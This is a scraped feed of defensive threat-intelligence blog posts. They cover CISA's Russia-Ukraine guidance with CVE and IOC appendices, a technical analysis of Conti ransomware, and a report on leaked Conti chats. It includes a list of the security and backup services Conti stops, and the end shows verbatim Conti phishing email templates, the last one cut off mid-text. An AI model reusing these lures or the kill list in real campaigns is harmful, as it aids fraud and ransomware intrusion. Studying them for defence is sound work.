In this amplified threat environment, the entire Qualys team is available to help our customers improve cybersecurity and resilience.\n\n* * *\n\n**Implement CISA\u2019s Shields Up Guidance**\n\n[Try it Now](<https://www.qualys.com/forms/cisa-shields-up-service/>)\n\n* * *\n\n### **Appendix:**\n\n#### CISA catalog of known exploited vulnerabilities by state attackers\n\n**CVE**| **QID**| **Title**| **Release Date**| **CVSS_V3** \n---|---|---|---|--- \nCVE-2018-13379| 43702| Fortinet Fortigate (FortiOS) System File Leak through Secure Sockets Layer (SSL) Virtual Private Network (VPN) via Specially Crafted Hypertext Transfer Protocol (HTTP) Resource Requests (FG-IR-18-384)| 9/12/2019| 9.8 \nCVE-2019-1653| 13405| Cisco Small Business RV320 and RV325 Router Multiple Security Vulnerabilities| 1/29/2019| 7.5 \nCVE-2019-2725| 87386| Oracle WebLogic Server Remote Code Execution Vulnerability (Oracle Security Alert Advisory - CVE-2019-2725)| 4/27/2019| 9.8 \nCVE-2019-7609| 371687| Kibana Multiple Security Vulnerabilities (ESA-2019-01,ESA-2019-02,ESA-2019-03)| 4/18/2019| 10 \nCVE-2019-9670| 375990| Zimbra XML External Entity Injection (XXE) Vulnerability| 8/12/2021| 9.8 \nCVE-2019-10149| 50092| Exim Remote Command Execution Vulnerability| 6/5/2019| 9.8 \nCVE-2019-11510| 38771| Pulse Connect Secure Multiple Security Vulnerabilities (SA44101)| 8/6/2019| 10 \nCVE-2019-19781| 372305| Citrix ADC And Citrix Gateway Arbitrary Code Execution Vulnerability (CTX267027)| 12/23/2019| 9.8 \nCVE-2020-0688| 50098| Microsoft Exchange Server Security Update for February 2020| 2/12/2020| 9.8 \nCVE-2020-4006| 13215| VMware Workspace One Access Command Injection Vulnerability (VMSA-2020-0027)| 12/7/2020| 9.1 \nCVE-2020-5902| 38791| F5 BIG-IP ASM,LTM,APM TMUI Remote Code Execution Vulnerability (K52145254) (unauthenticated check)| 7/5/2020| 9.8 \nCVE-2020-14882| 87431| Oracle WebLogic Server Multiple Vulnerabilities (CPUOCT2020)| 10/21/2020| 9.8 \nCVE-2021-26855, CVE-2021-26857, 
CVE-2021-26858, CVE-2021-27065 | 50107| Microsoft Exchange Server Remote Code Execution Vulnerability (ProxyLogon)| 3/3/2021| 9.8 \n \nSee the full list of [CISA known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).\n\n#### List of IOCs related to Hermetic Wiper aka KillDisk\n\n**SHA256 Hashes** \n--- \n0385eeab00e946a302b24a91dea4187c1210597b8e17cd9e2230450f5ece21da \n06086c1da4590dcc7f1e10a6be3431e1166286a9e7761f2de9de79d7fda9c397 \n095c7fa99dbc1ed7a3422a52cc61044ae4a25f7f5e998cc53de623f49da5da43 \n0db5e5b68dc4b8089197de9c1e345056f45c006b7b487f7d8d57b49ae385bad0 \n1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d292591 \n2c10b2ec0b995b88c27d141d6f7b14d6b8177c52818687e4ff8e6ecf53adf5bf \n34ca75a8c190f20b8a7596afeb255f2228cb2467bd210b2637965b61ac7ea907 \n3c557727953a8f6b4788984464fb77741b821991acbf5e746aebdd02615b1767 \n4dc13bb83a16d4ff9865a51b3e4d24112327c526c1392e14d56f20d6f4eaf382 \n7e154d5be14560b8b2c16969effdb8417559758711b05615513d1c84e56be076 \n923eb77b3c9e11d6c56052318c119c1a22d11ab71675e6b95d05eeb73d1accd6 \n9ef7dbd3da51332a78eff19146d21c82957821e464e8133e9594a07d716d892d \na196c6b8ffcb97ffb276d04f354696e2391311db3841ae16c8c9f56f36a38e92 \nb01e0c6ac0b8bcde145ab7b68cf246deea9402fa7ea3aede7105f7051fe240c1 \nb60c0c04badc8c5defab653c581d57505b3455817b57ee70af74311fa0b65e22 \nb6f2e008967c5527337448d768f2332d14b92de22a1279fd4d91000bb3d4a0fd \nc2d06ad0211c24f36978fe34d25b0018ffc0f22b0c74fd1f915c608bf2cfad15 \nd4e97a18be820a1a3af639c9bca21c5f85a3f49a37275b37fd012faeffcb7c4a \ndcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78 \ne5f3ef69a534260e899a36cec459440dc572388defd8f1d98760d31c700f42d5 \nf50ee030224bf617ba71d88422c25d7e489571bc1aba9e65dc122a45122c9321 \nfd7eacc2f87aceac865b0aa97a50503d44b799f27737e009f91f3c281233c17d \n \n#### List of MITRE ATT&CK TIDs provided by CISA\n\n**Tactic**| **Technique******| **Procedure****** \n---|---|--- \nReconnaissance 
[[TA0043](<https://attack.mitre.org/versions/v10/tactics/TA0043/>)]| Active Scanning: Vulnerability Scanning [[T1595.002](<https://attack.mitre.org/versions/v10/techniques/T1595/002/>)]| Russian state-sponsored APT actors have performed large-scale scans in an attempt to find vulnerable servers. \nPhishing for Information [[T1598](<https://attack.mitre.org/versions/v10/techniques/T1598>)]| Russian state-sponsored APT actors have conducted spearphishing campaigns to gain credentials of target networks. \nResource Development [[TA0042](<https://attack.mitre.org/versions/v10/tactics/TA0042/>)]| Develop Capabilities: Malware [[T1587.001](<https://attack.mitre.org/versions/v10/techniques/T1587/001>)]| Russian state-sponsored APT actors have developed and deployed malware, including ICS-focused destructive malware. \nInitial Access [[TA0001](<https://attack.mitre.org/versions/v10/tactics/TA0001/>)]| Exploit Public Facing Applications [[T1190](<https://attack.mitre.org/versions/v10/techniques/T1190/>)]| Russian state-sponsored APT actors use publicly known vulnerabilities, as well as zero-days, in internet-facing systems to gain access to networks. \nSupply Chain Compromise: Compromise Software Supply Chain [[T1195.002](<https://attack.mitre.org/versions/v10/techniques/T1195/002>)]| Russian state-sponsored APT actors have gained initial access to victim organizations by compromising trusted third-party software. Notable incidents include M.E.Doc accounting software and SolarWinds Orion. \nExecution [[TA0002](<https://attack.mitre.org/versions/v10/tactics/TA0002>)]| Command and Scripting Interpreter: PowerShell [[T1059.003](<https://attack.mitre.org/versions/v10/techniques/T1059/003>)] and Windows Command Shell [[T1059.003](<https://attack.mitre.org/versions/v10/techniques/T1059/003>)]| Russian state-sponsored APT actors have used `cmd.exe` to execute commands on remote machines. 
They have also used PowerShell to create new tasks on remote machines, identify configuration settings, exfiltrate data, and to execute other commands. \nPersistence [[TA0003](<https://attack.mitre.org/versions/v10/tactics/TA0003>)]| Valid Accounts [[T1078](<https://attack.mitre.org/versions/v10/techniques/T1078/>)]| Russian state-sponsored APT actors have used credentials of existing accounts to maintain persistent, long-term access to compromised networks. \nCredential Access [[TA0006](<https://attack.mitre.org/versions/v10/tactics/TA0006>)]| Brute Force: Password Guessing [[T1110.001](<https://attack.mitre.org/versions/v10/techniques/T1110/001>)] and Password Spraying [[T1110.003](<https://attack.mitre.org/versions/v10/techniques/T1110/003>)]| Russian state-sponsored APT actors have conducted brute-force password guessing and password spraying campaigns. \nOS Credential Dumping: NTDS [[T1003.003](<https://attack.mitre.org/versions/v10/techniques/T1003/003/>)]| Russian state-sponsored APT actors have exfiltrated credentials and exported copies of the Active Directory database `ntds.dit`. \nSteal or Forge Kerberos Tickets: Kerberoasting [[T1558.003](<https://attack.mitre.org/versions/v10/techniques/T1558/003/>)]| Russian state-sponsored APT actors have performed \u201cKerberoasting,\u201d whereby they obtained the Ticket Granting Service (TGS) Tickets for Active Directory Service Principal Names (SPN) for offline cracking. \nCredentials from Password Stores [[T1555](<https://attack.mitre.org/versions/v10/techniques/T1555>)]| Russian state-sponsored APT actors have used previously compromised account credentials to attempt to access Group Managed Service Account (gMSA) passwords. 
\nExploitation for Credential Access [[T1212](<https://attack.mitre.org/versions/v10/techniques/T1212>)]| Russian state-sponsored APT actors have exploited Windows Netlogon vulnerability [CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) to obtain access to Windows Active Directory servers. \nUnsecured Credentials: Private Keys [[T1552.004](<https://attack.mitre.org/versions/v10/techniques/T1552/004>)]| Russian state-sponsored APT actors have obtained private encryption keys from the Active Directory Federation Services (ADFS) container to decrypt corresponding SAML signing certificates. \nCommand and Control [[TA0011](<https://attack.mitre.org/versions/v10/tactics/TA0011/>)]| Proxy: Multi-hop Proxy [[T1090.003](<https://attack.mitre.org/versions/v10/techniques/T1090/003/>)]| Russian state-sponsored APT actors have used virtual private servers (VPSs) to route traffic to targets. The actors often use VPSs with IP addresses in the home country of the victim to hide activity among legitimate user traffic.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2022-02-26T20:20:32", "type": "qualysblog", "title": "Russia-Ukraine Crisis: How to Strengthen Your Security Posture to Protect against Cyber Attack, based on CISA Guidelines", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, 
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-10149", "CVE-2019-11510", "CVE-2019-1653", "CVE-2019-19781", "CVE-2019-2725", "CVE-2019-7609", "CVE-2019-9670", "CVE-2020-0688", "CVE-2020-1472", "CVE-2020-14882", "CVE-2020-4006", "CVE-2020-5902", "CVE-2021-26855", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2022-02-26T20:20:32", "id": "QUALYSBLOG:01C65083E501A6BAFB08FCDA1D561012", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-18T18:37:13", "description": "Conti is a sophisticated Ransomware-as-a-Service (RaaS) model first detected in December 2019. Since its inception, its use has grown rapidly and has even displaced the use of other RaaS tools like Ryuk. The [Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI)](<https://us-cert.cisa.gov/ncas/current-activity/2021/09/22/cisa-fbi-and-nsa-release-joint-cybersecurity-advisory-conti>) issued a warning about Conti in Sept 2021, noting that they had observed it being used in more than 400 cyberattacks globally, though concentrated in North America and Europe.\n\nThe most common initial infection vectors used are spear phishing and RDP (Remote Desktop Protocol) services. Phishing emails work either through malicious attachments, such as Word documents with an embedded macro that can be used to drop/download BazarLoader, Trickbot, IceID trojans, or via social engineering tactics employed to get the victim to provide additional information or access credentials. Following initial access, attackers download and execute a Cobalt Strike beacon DLL to gather information about domain admin accounts. 
Additionally, threat actors use Kerberos attacks to attempt to get admin hash in order to conduct brute force attacks.\n\nA Conti affiliate recently leaked what has been dubbed the [Conti playbook](<https://www.bleepingcomputer.com/news/security/translated-conti-ransomware-playbook-gives-insight-into-attacks/>). The playbook revealed that Conti actors also exploit vulnerabilities in unpatched assets to escalate privileges and move laterally across a victim\u2019s network. They check for the "PrintNightmare" vulnerability (CVE-2021-34527) in Windows Print spooler service, EternalBlue vulnerability (CVE-2017-0144) in Microsoft Windows Server Message Block, and the "Zerologon" vulnerability (CVE-2020-1472) in Microsoft Active Directory Domain Controller. The playbook has been translated from Russian to English by security researchers and has provided other useful Indicators of Compromise (IoC).\n\nConti actors also use the RouterScan tool to identify router devices in a provided range of IPs and attempt to find logins/passwords from a standard list available with the RouterScan tool. They then install AnyDesk or Atera on the target machine to maintain an open communication channel. Like other ransomware attacks, Conti actors exfiltrate data from victims\u2019 networks to cloud storage services like MEGA and then deploy Conti ransomware. To upload data on cloud storage Conti uses open-source Rclone command-line software. They use a double extortion approach in which they demand a ransom to release the encrypted data or threaten to publicly release it if a ransom is not paid. They may also sell the data to the highest bidder.\n\n### Technical Details:\n\nConti ransomware uses obfuscation. The most notable use is to hide various Windows API calls used by the malware. It is common for some malware to lookup API calls during execution. Initially, it brings import module names then decrypts the API names and gets their addresses.\n\nFig. 
1 De-obfuscation of Windows API\n\nConti uses a unique String Decryption Routine that is applied to almost every string text or API name used by the malware as shown in Fig. 2:\n\nFig. 2 String Decryption Routine\n\nAfter getting API addresses, it calls for `CreateMutexA` API with the Mutex Value of "_CONTI_" as shown below in Fig. 3:\n\nFig. 3 Create Mutex\n\nIt deletes Windows Volume Shadow Copies and also resizes shadow storage for drives C to H:\n\nFig. 4 Deletes Windows Volume Shadow Copy\n\nNext, Conti executes commands for stopping potential Windows Services related to antivirus, security, backup, database, and email solutions:\n\nFig. 5 Stop Potential Windows Services\n\nThe table below contains the names of the Windows Services that Conti stopped by calling the code in Fig. 5 in the loop.\n\nMSSQL$BKUPEXEC| MSSQL$SQLEXPRESS| MSSQLFDLauncher$SHAREPOINT \n---|---|--- \nMSSQL$ECWDB2| MSSQL$SYSTEM_BGC| MSSQLFDLauncher$SQL_2008 \nMSSQL$PRACTICEMGT| MSSQL$TPS| MSSQLFDLauncher$SYSTEM_BGC \nMSSQL$PRACTTICEBGC| MSSQL$TPSAMA| MSSQLFDLauncher$TPS \nMSSQL$PROD| MSSQL$VEEAMSQL2008R2| MSSQLFDLauncher$TPSAMA \nMSSQL$PROFXENGAGEMENT| MSSQL$VEEAMSQL2008R2| MSSQLSERVER \nMSSQL$SBSMONITORING| MSSQL$VEEAMSQL2012| MSSQLServerADHelper \nMSSQL$SHAREPOINT| MSSQLFDLauncher| MSSQLServerADHelper100 \nMSSQL$SOPHOS| MSSQLFDLauncher$PROFXENGAGEMENT| MSSQLServerOLAPService \nMSSQL$SQL_2008| MSSQLFDLauncher$SBSMONITORING| MySQL57 \nAcronis VSS Provider| Mfemms| DCAgent \nAcronisAgent| Mfevtp| EhttpSrv \nAcrSch2Svc| MMS| Ekrn \nAntivirus| Mozyprobackup| Enterprise Client Service \nARSM| MsDtsServer| EPSecurityService \nAVP| MsDtsServer100| EPUpdateService \nBackupExecAgentAccelerator| MsDtsServer110| EraserSvc11710 \nBackupExecAgentBrowser| MSExchangeES| EsgShKernel \nBackupExecDeviceMediaService| MSExchangeIS| ESHASRV \nBackupExecJobEngine| MSExchangeMGMT| FA_Scheduler \nBackupExecManagementService| MSExchangeMTA| MSOLAP$TPSAMA \nBackupExecRPCService| MSExchangeSA| McShield 
\nBackupExecVSSProvider| MSExchangeSRS| McTaskManager \nBedbg| msftesql$PROD| Mfefire \nIISAdmin| MSOLAP$SQL_2008| Klnagent \nIMAP4Svc| MSOLAP$SYSTEM_BGC| MSOLAP$TPS \n \nConti also leverages the Windows Restart Manager to close applications and services that are running in order to make them available for encryption and to maximize the damage:\n\nFig. 6 Unlock files with Windows Restart Manager\n\nIt collects information about drives and drive types present on compromised systems:\n\nFig. 7 Collect Drives Information\n\nAs shown in Fig. 8, Conti uses multi-threaded tactics. It calls the `CreateIoCompletionPort` API to create multiple instances of worker threads in memory that wait for data. Once the file listing is completed, it is passed to the worker threads. Utilizing the computing power of multi-core CPUs, the data is quickly encrypted:\n\nFig. 8 Implementation of Multi-threaded Processing Fig. 9 Multiple Threads Perform File Encryption\n\nConti then iterates files on the local system and those on remote SMB network shares to determine what data to encrypt. It looks for folders and drives shared on remote systems using the `NetShareEnum` API. If the remote share is accessible, it encrypts the files present in that share:\n\nFig. 10 Getting Info of Remote Shares\n\nIt collects ARP cache information from the local system using the `GetIpNetTable` API. ARP cache information is a list of all the systems with which the computer recently communicated. It checks for "172.", "192.168." etc., on the collected IP list. If an IP address is in a different range, it skips that system during encryption:\n\nFig. 11 Collect ARP Cache Information\n\nIt uses an AES-256 encryption key per file with a hard-coded RSA-4096 public encryption key. As shown in Fig. 12, the 0x6610 parameter is used while calling the `CryptGenKey` API. 0x6610 is the value of the CALG_AES_256 identifier, passed as the `Algid` argument:\n\nFig. 
12 Create CALG_AES_256 Key\n\nConti has a unique feature that allows attackers to perform file encryption in command line mode:\n\nFig. 13 Command Line Mode of Operation\n\n### Modes of Operation\n\nConti accepts two command line options: `--encrypt-mode` and `-h`:\n\nFig. 14 Command Line `--encrypt-mode` Mode\n\n`--encrypt-mode` selects which files are encrypted. There are 3 options for its value: `all`, `local`, and `network`. By default, the ransomware runs with the `all` parameter:\n\nFig. 15 Command Line `--encrypt-mode` with Value `all`\n\nWith `all`, encryption is carried out for both local and network targets. `network` means that shared resources on the local network will be encrypted:\n\nFig. 16 Command Line `--encrypt-mode` Mode with Value `local` Fig. 17 Command Line `--encrypt-mode` Mode with Value `network`\n\nIn command line `-h` mode, the parameter may contain the name of a file that lists the DNS and NetBIOS addresses of remote servers. The malware will then build a list of folders to ignore during encryption:\n\nFig. 18 Folders Ignored in Encryption\n\nIt skips the following extensions during encryption: .exe, .dll, .sys, .lnk, and .CONTI. It appends the file extension `.CONTI` and creates a ransom note named `CONTI_README.txt` in every folder to notify users about the infection:\n\nFig. 19 \u201c.CONTI\u201d Extension Appended to Files\n\n### The Ransom Note:\n\nThe ransom note and the note\u2019s file information are present in the resource section of the malware file:\n\nFig. 20 Ransom Note Content Fig. 21 Ransom Note Name\n\nIt calls the `LoadResource` API to get ransom note-related information:\n\nFig. 22 Code to Collect Data Related to the Ransom Note\n\nThe ransom note contains 2 email addresses to get in touch with the attackers. The addresses are unique for each victim:\n\nFig. 
23 Ransom Note\n\n### IoC:\n \n \n eae876886f19ba384f55778634a35a1d975414e83f22f6111e3e792f706301fe\n\n### TTP Map:\n\nInitial Access| Execution| Persistence| Privilege Escalation| Defense Evasion| Credential Access| Discovery| Lateral Movement| Collection| Command and control| Exfiltration| Impact \n---|---|---|---|---|---|---|---|---|---|---|--- \nValid Accounts (T1078)| Command and Scripting Interpreter: Windows Command Shell (T1059.003)| Valid Accounts (T1078)| Process Injection: Dynamic-link Library Injection (T1055.001)| Obfuscated Files or Information (T1027)| Brute Force (T1110)| System Network Configuration Discovery (T1016)| Remote Services: SMB/Windows Admin Shares (T1021.002)| Archive Collected Data: Archive via Utility (T1560.001)| Remote file copy (T1105)| Exfiltration Over Web Service: Exfiltration to Cloud Storage (T1567.002)| Data Encrypted for Impact (T1486) \nPhishing: Spearphishing Attachment (T1566.001)| Native Application Programming Interface (API)(T1106)| External Remote Services (T1133)| Valid accounts: domain accounts (T1078.002)| Process Injection: Dynamic-link Library Injection (T1055.001)| Steal or Forge Kerberos Tickets: Kerberoasting (T1558.003)| System Network Connections Discovery (T1049)| Taint Shared Content (T1080)| | | | Service Stop (T1489) \nPhishing: Spearphishing Link (T1566.002)| Windows Management Instrumentation (T1047)| Scheduled task/job: scheduled task (T1053.005)| | Deobfuscate/Decode Files or Information (T1140)| OS credential dumping (T1003)| Process Discovery (T1057)| Exploitation of Remote Services (T1210)| | | | Inhibit System Recovery (T1490) \nExploit public-facing application (T1190)| User execution (T1204)| Startup item (T1165)| | Impair defenses: disable or modify tools (T1562.001)| Credentials from password stores (T1555)| File and Directory Discovery (T1083)| Lateral tool transfer (T1570)| | | | \n| Scheduled task/job: scheduled task (T1053.005)| Boot or logon autostart execution: Winlogon Helper DLL 
(T1547.004)| | | | Network Share Discovery (T1135)| | | | | \n| Command and Scripting Interpreter: PowerShell (T1059.001)| | | | | Remote System Discovery (T1018)| | | | | \n| | | | | | Network Service Scanning (T1046)| | | | | \n| | | | | | Permission groups discovery: domain groups (T1069.002)| | | | | \n| | | | | | System information discovery (T1082)| | | | | \n| | | | | | System owner/user discovery (T1033)| | | | | \n| | | | | | Security software discovery (T1063)| | | | | \n| | | | | | Account Discovery: Local Account (T1087.001)| | | | | \n| | | | | | Permissions Group Discovery: Local Groups (T1069.001)| | | | | \n| | | | | | | | | | | \n \n### Summary\n\nTo defend against threats, Qualys recommends good cyber hygiene practices, and moving to a preventative approach by keeping network configurations, backup, application access, and patching up-to-date.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-11-18T17:17:56", "type": "qualysblog", "title": "Conti Ransomware", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0144", "CVE-2020-1472", "CVE-2021-34527"], "modified": "2021-11-18T17:17:56", "id": 
"QUALYSBLOG:6652DB89D03D8AA145C2F888B5590E3F", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2022-03-09T17:28:27", "description": "\n\n**_UPDATE:_** _As of March 2, 2022, Conti began taking down exposed infrastructure as a result of the chat disclosure. At that time, we assessed that due to their sophisticated capability, deep funding, and quick recovery from exposed infrastructure in November 2021, they remained an active and significant threat. As of March 9, 2022, our threat intelligence team has observed a resumption of normal operations from Conti._\n\nOn February 27, Twitter user [@ContiLeaks](<https://twitter.com/contileaks>) released a trove of chat logs from Conti \u2013 a sophisticated ransomware group whose manual was publicly [leaked last year](<https://blog.talosintelligence.com/2021/09/Conti-leak-translation.html>). Ahead of the chat log disclosures, Conti pledged their support for the Russian Government following the Russian invasion of Ukraine. However, a number of members sided with Ukraine, causing strife within the organization. Two days later, Conti posted a second message revising their statement to condemn the war and to strike back only if Russian critical infrastructure is targeted.\n\n_Conti announcement of support for Russian government_\n\n_Conti walk-back of their support for Russia_\n\n_@ContiLeaks announcement of the release_\n\nAt the time of the leak, a file titled `1.tgz` was released on the \u201cAnonFiles\u201d website, containing 14 megabytes of chat logs across 393 JSON files. However, some of the messages were encrypted and could not be read, so the information provided is necessarily incomplete. The remaining files contained internal Conti communications, screenshots of tools, and discussions of their exploits and design processes. 
\n\nOn February 28 and March 1, a bevy of additional files were posted, along with a number of pro-Ukraine tweets. Among both sets of leaked messages, there were a number of usernames and passwords for a variety of accounts. Additionally, user @ContiLeaks shared access details for a number of alleged Conti command and control servers, plus storage servers for stolen files. However, we have not accessed any of the data necessitating access to remote servers or the use of usernames and passwords, and we strongly recommend against doing so. \n\n@ContiLeaks also shared a file that they purport to be the source code for the Conti ransomware but declined to share the password except with \u201ctrusted parties.\u201d @ContiLeaks did, however, name one alleged Conti developer, providing their email address and Github. The scale of the leaked information suggests that the leaker is likely either a very senior member of the group or a coalition of disgruntled Conti affiliates.\n\n## Conti is a business \u2013 and a well-funded one\n\nMuch of the discussion within the chat logs concerns fairly mundane things \u2013 interviewing potential operators of the group, payment for services, out-of-office messages, gossip, and discussions of products. Based on the leaked chats, the Conti interview process actually looks a lot like a standard technical interview, with coding exercises to be performed hosted on public code repositories, salary negotiations, and the status of ongoing products. \n\nIn addition to other financial information related to specific actors, the leaked chats have revealed Conti\u2019s primary Bitcoin address, which contains over **two billion USD** as of February 28, 2022. 
Moreover, a conversation on April 9, 2021 between \u201cmango\u201d and \u201cjohnyboy77\u201d indicates Russian FSB involvement in some portion of their funding and that the FSB were interested in files from the media outlet Bellingcat on \u201cNavalny\u201d \u2013 an apparent reference to Alexei Navalny, the currently imprisoned opposition leader in Russia.\n\n## Conti development\n\nConti seems to operate much like a software company \u2013 the chat logs disclose concerns with the development of specific features for targets and a particular difficulty in encrypting very large files. The Conti team also attempted to get demos of popular endpoint detection software with the intent to develop their malware to avoid detection.\n\nTwo of the actors, \u201clemur\u201d and \u201cterry\u201d shared phishing templates (included verbatim in Appendix B at the end of this post) to be used against potential targets. Conti gains initial access in many ways, with phishing a popular line of attack due in part to its relatively high efficacy and low cost. Conti often uses phishing emails to establish a presence on targeted networks.\n\nA screenshot of the Conti control panel was also leaked, showing a number of compromised hosts and a breakdown of the operating systems, antiviruses, user rights, and detailed information about the infected assets.\n\n_Conti control panel_\n\nFurther discussions detailed the use of infrastructure against targets, disclosing a number of both known and unknown Conti command and control domains. At the time of this post, only a small number of the previously unknown command and control domains appear to be active. Conversations between two operators, \u201cStern\u201d and \u201cBentley\u201d discuss the use of third parties for malicious documents, favoring certain providers over others. They also discuss logistics for how to deliver ransomware without being detected by dynamic analysis. 
In a conversation between the two back in June of 2021, Stern discloses that Conti wants to start their own cryptocurrency but does not know who to work with. There is no evidence that anything came of this desire, and Conti continues to use Bitcoin for their ransoms. \n\n## Other groups assert they are strictly business\n\nIn stark contrast to Conti, other groups have made it clear to the public that despite their \u201cbusiness model,\u201d they take no public stance on this crisis. LockBit is remaining aloof from the conflict and made it clear that they intend to operate as usual. Although it is believed that LockBit is a Russian organization, they assert that \u201cwe are all simple and peaceful people, we are all Earthlings,\u201d and \u201cfor us it is just business and we are all apolitical.\u201d Another ransomware group, ALPHV, claims to be \u201cextremely saddened\u201d by Conti\u2019s pledge of support and condemns Conti. Their message concludes, \u201cThe Internet, and even more so its dark side, is not the place for politics.\u201d\n\n## Rumors of Conti\u2019s demise have been greatly exaggerated\n\nConti\u2019s payment and \u201csupport\u201d portal is still live, even following the infighting and leaks. Conti has repeatedly proven to be one of the most capable ransomware actors and these chats indicate that the group is well-organized and still very well-funded despite the schism. 
Any suggestion that these leaks spell the end for Conti is overstated, and we expect that Conti will continue to be a powerful player in the ransomware space.\n\n## What you can do\n\nWe are keeping an eye on dark web activity related to Conti and other ransomware groups and want to reiterate the following steps for protecting yourself from ransomware: \n\n\n * User education, especially related to well-crafted phishing campaigns\n * Asset and vulnerability management, including reducing your external attack surface\n * Multi-factor authentication \n\n\nAdditionally, it is worth ensuring that you are well-guarded against the exploits and malware commonly used by Conti (vulnerabilities provided in Appendix A at the end of this post). Furthermore, security teams should also take some time to review [CISA\u2019s recent report on the group](<https://www.cisa.gov/uscert/ncas/alerts/aa21-265a>). For further discussion on how to protect yourself from ransomware, see our [ransomware playbook](<https://www.rapid7.com/solutions/ransomware/>). \n\n\n## Appendix A \u2013 Conti known exploited vulnerabilities\n\nCVE-2017-0143, CVE-2017-0144, CVE-2017-0145, CVE-2017-0146 (MS17-010; EternalBlue/EternalSynergy/EternalChampion)\n\nCVE-2020-1472 (ZeroLogon)\n\nCVE-2021-34527 (PrintNightmare)\n\nCVE-2021-44228 (Log4Shell)\n\nCVE-2021-34473, CVE-2021-34523, CVE-2021-31207 (ProxyShell/ProxyLogon)\n\n## Appendix B \u2013 Phishing templates\n\n{Greetings|Hello|Good afternoon|Hi|Good day|Greeting|Good morning|Good evening}! \n{Here|Right here|In this letter|With this letter} we {send|direct} you {all the|all the necessary|the most important} {documentation|papers|documents|records} {regarding|concerning|relating to} your {payment|deposit payment|last payment} {#|\u2116|No. }\u041d\u041e\u041c\u0415\u0420 \u041f\u041b\u0410\u0422\u0415\u0416\u0410, right {as we|as we have} {discussed|revealed} {not so long ago|not too long ago|recently|just recently|not long ago}. 
Please {review the|check the|take a look at} \u0430ll {necessary|required|important} {information|data} in the {file attached|attached file}. \n\u0422: {Payment|Deposit payment} {invoice|receipt} {#|\u2116|No. }\u041d\u041e\u041c\u0415\u0420 \u0418\u041d\u0412\u041e\u0419\u0421\u0410 {prepared|formed} \nD: {payment|deposit|dep|paym}_{info|information|data}\n\n{Hello|Greetings|Greetings to you|Good evening|Good morning|Good day|Good afternoon}{!|,|.|} \nYour {order|purchase order|online order} was {successfully|correctly|timely} {paid|compensated|covered} by you {yesterday|today|recently}. Your {documentation|docs|papers} and {bank check|receipt|paycheck} {can be found|are listed} in the {attached file|file attached}. \nT: {Invoice|Given invoice|Bill} {we|we have|we\u2019ve} {sent|mailed|delivered} to you {is paid|is covered|is processed}. \nD: {Purchase order|Order} {verification|approval}\n\n{Hello|Greetings|Greetings to you|Good evening|Good morning|Good day|Good afternoon}{!|,|.|} \n{We are contacting you to|This is to|This mail is to} {notify|remind} you {about|regarding} your {debt|unprocessed payment} for {our last|the recent|our recent} {contract|agreement}. All {compensation|payment} {data|information}, {agreement|contract} and prepared legal {documents|documentation} {can be found|are located} in the {file attached|attached file}. \nT: {Missing|Additional} payment {information|details|info} reminder \nD: {Contract|Agreement} 2815/2 {case|claim}\n\n{Hello|Greetings|Greetings to you|Good evening|Good morning|Good day|Good afternoon}{!|,|.|} \n{Your payment|Your advance payment|Your obligatory payment|Payment you sent|Payment you made} was {successfully|correctly|timely|properly} {achieved|accomplished|approved|affirmed|received|obtained|collected|processed}. 
